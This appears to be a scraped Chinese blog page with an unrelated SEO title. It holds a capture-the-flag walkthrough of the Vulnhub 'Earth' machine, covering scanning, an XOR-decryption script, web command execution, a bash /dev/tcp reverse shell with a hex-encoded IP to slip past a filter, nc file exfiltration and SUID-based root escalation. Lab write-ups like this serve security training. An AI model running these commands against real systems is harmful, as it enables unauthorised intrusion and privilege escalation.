当前位置: 首页 > news >正文

管理系统网站开发报价用表格做网站教程

管理系统网站开发报价,用表格做网站教程,中国菲律宾时差,安徽网站建设的基本步骤文章目录 Vulnhub系列靶机-The Planets: Earth1. 信息收集1.1 主机扫描1.2 端口扫描1.3 目录爆破 2. 漏洞探测2.1 XOR解密2.2 解码 3. 漏洞利用3.1 反弹Shell 4. 权限提升4.1 NC文件传输 Netcat#xff08;nc#xff09;文件传输 Vulnhub系列靶机-The Planets: Earth 1. 信息… 文章目录 Vulnhub系列靶机-The Planets: Earth1. 信息收集1.1 主机扫描1.2 端口扫描1.3 目录爆破 2. 漏洞探测2.1 XOR解密2.2 解码 3. 漏洞利用3.1 反弹Shell 4. 权限提升4.1 NC文件传输 Netcatnc文件传输 Vulnhub系列靶机-The Planets: Earth 1. 信息收集 1.1 主机扫描 arp-scan -l1.2 端口扫描 nmap -p- -A 192.168.188.198发现靶机开启了2280443端口 访问页面 页面报错误请求400在hosts文件中加入DNS解析 访问http://earth.local/ 1.3 目录爆破 dirsearch -u http://earth.local/ -e * -i 200爆破出来了/admin/login目录浏览器中访问一下发现是一个登录页面。 对另一个页面进行目录爆破 dirsearch -u https://terratest.earth.local/ -i 2002. 漏洞探测 页面访问一下robots.txt 发现除了常规的格式不能访问之外最后有一个Disallow: /testingnotes.*和上面的后缀格式拼接访问txt文件。 翻译页面 测试安全消息传递系统注意事项 *使用异或加密作为算法应该与RSA中使用的一样安全。 *地球已经确认他们收到了我们发送的信息。 *testdata.txt用于测试加密。 *terra用作管理员门户的用户名。 待办事项 *我们如何安全地将每月的钥匙发送到地球或者我们应该每周换一次钥匙 *需要测试不同的密钥长度以防止暴力。钥匙应该有多长 *需要改进消息传递界面和管理面板的界面这是目前非常基本的。到这里我们知道加密算法是XOR用户名是terra并且还有一个testdata.txt用于测试加密。 页面访问/testdata.txt 翻译如下 根据放射性测年法和其他证据地球形成于45亿年前。在地球历史的最初10亿年里生命出现在海洋中并开始影响地球的大气和表面导致厌氧生物和后来的好氧生物的增殖。一些地质证据表明生命可能早在41亿年前就出现了。回到之前的页面在http://earth.local/下面有三串数据 通过三个秘钥去尝试找到用户名为terra对应的密码 2.1 XOR解密 XOR全称为Exclusive OR异或是一种逻辑运算符。XOR常用于数据加密、校验和计算。 将Previous Messages与testdata.txt进行XOR运算这里我们编写脚本来XOR解密。 import binasciidata1 37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40 data2 3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45 data3 2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a f binascii.b2a_hex(open(testdata.txt, rb).read()).decode() print(hex(int(data1,16) ^ int(f,16))) print(hex(int(data2,16) ^ int(f,16))) print(hex(int(data3,16) ^ int(f,16)))testdata.txt文件内容。 执行脚本获得的三串数据都是十六进制的 2.2 解码 使用utools中的解码工具进行解码。 第一串字符 第二串字符 第三串字符 可以看到前两个没有重要数据第三个是重复的earthclimatechangebad4humans 尝试用户名和密码进行登录 terra earthclimatechangebad4humans登录成功 观察页面发现可以执行命令 命令执行漏洞 查看是否有flag文件发现一个/var/earth_web/user_flag.txt 查看/var/earth_web/user_flag.txt文件 获取到第一个flag 3. 漏洞利用 3.1 反弹Shell 既然可以执行命令那么我们可以反弹shell bash -i /deb/tcp/192.168.188.198/8888 01发现远程连接被禁止了。 这种情况可以对IP地址进行十六进制编码或者对整个命令进行base64编码。这里我选择对IP地址进行十六进制编码。 IP地址进制转换。 bash -i /dev/tcp/0XC0A8BC9D/8888 01然后kali主机上监听8888端口 nc -lnvp 8888 -e /bin/bash反弹成功 查看当前用户的权限 发现权限较低尝试进行提取。 4. 权限提升 查看一些特殊权限的文件 find / -perm -us -type f 2/dev/null命令解析 -perm -us表示通过文件权限来匹配文件。其中-perm用于指定要匹配的权限-u表示用户权限而s表示SetUID权限。SetUID权限Set User ID是一种特殊的权限位当用户执行该文件时会以该文件的所有者的身份来执行。-type f表示只匹配普通文件regular file。这里的f表示文件。2/dev/null将错误输出stderr重定向到/dev/null即丢弃错误信息。 看到reset_root文件尝试运行 发现无法运行。 4.1 NC文件传输 使用nc进行传输文件 在Kali上输入nc -nlvp 7788 reset_root开启监听 在靶机中输入如下命令 nc 192.168.188.157 7788 /usr/bin/reset_root命令解析 使用Netcatnc工具将 /usr/bin/reset_root 文件发送到 IP 地址为 192.168.188.157 的接收端的 7788 端口。 strace调试工具 使用strace工具检测reset_root文件的运行过程如果没有可以进行下载。 sudo apt install strace对reset_root进行调试给reset_root文件赋予执行权限 chmod x reset_root strace ./reset_root命令解析 strace是一个用于跟踪进程系统调用和信号的工具 strace表示启动strace工具。./reset_root表示要执行的可执行文件或命令。 发现文件执行失败是因为少了这三个文件或目录。 在靶机shell上创建这三个文件 进入靶机终端进行创键 touch /dev/shm/kHgTFI5G touch /dev/shm/Zw7bV9U5 touch /tmp/kcM0Wewe创建完成后执行reset_root 获取到了root的密码Earth 成功获得root权限得到最后的flag Netcatnc文件传输 使用Netcatnc进行文件传输可以在计算机之间快速传输文件。Netcat是一个网络工具它能够创建网络连接、发送和接收数据。 详细步骤 在接收端启动监听 nc -l -p port received_file在接收端运行上述命令来监听指定的端口。-l 参数表示监听模式-p port 参数用于指定监听的端口号。所有传入的数据将被重定向到 received_file 文件中。 在发送端发送文件 nc receiver_ip receiver_port file_to_send在发送端运行上述命令来发送文件。receiver_ip 是接收端的 IP 地址receiver_port 是接收端开放的端口号 file_to_send 是要发送的文件名或路径。Netcat将会将文件的内容通过网络发送到接收端。 接收端接收文件 接收端会将数据写入 received_file 指定的文件中。你可以在接收端的文件系统中找到该文件并对其进行进一步处理。 在使用的时候确保以下几点 发送端和接收端之间存在网络连接并且网络设置正确。接收端的端口没有被防火墙或其他网络安全设备阻塞。发送端和接收端都有足够的权限读取和写入文件。确保文件路径和文件名是正确的。
http://www.zqtcl.cn/news/385059/

相关文章:

  • 长沙的互联网网站公司招标文件免费下载网站
  • icp备案系统网站品网站建设公司排名
  • 什么网站可以做音乐相册可信的品牌网站建设
  • 洛阳网站建设优惠公司网站查询ip地址
  • 学校网站模版电影网站要怎样做才有出路
  • 无锡网站建设 微信企业网站建设与管理期末考试
  • 海南海口网站开发公司怎么建立微网站?
  • 网站建设 鄂icp备app 微网站
  • 西安做网站seo网站站内优化怎么做
  • 建设网站方案公司wordpress 视差主题
  • 网站 建设 语言wordpress同步
  • 三水 网站建设建设部网站网上大厅
  • 深圳高端企业官方网站建设最好的网站设计开发公司
  • 主流大型网站开发语言调查怀柔富阳网站建设
  • 公司网站建设服务类别最便宜云主机永久免费
  • 心悦dnf免做卡网站竞价恶意点击犯法吗
  • 企业网站的类型包括无锡专业网站建设
  • 手机版刷赞网站建设软文代写文案
  • 网站内容与目录结构色一把做最好的网站
  • 优化网站方法企业做网站属于广告宣传费吗
  • 站长之家alexa排名网站架构 seo
  • 四川智能网站建设制作建设网站代理
  • 对网站建设好学吗智慧企业解决方案
  • 网站建站平台eazyshoph5制作微信小程序
  • 扬中网站建设 优帮云望野古诗带拼音
  • 网站和discuz同步登录建设产品网站课程
  • 常州做网站多少钱图片链接在线生成器
  • 服务器网站打不开可以做哪些网站
  • 建设银行网站信息补充网站如何备份
  • 网站建设 杭州市萧山区网页此站点不安全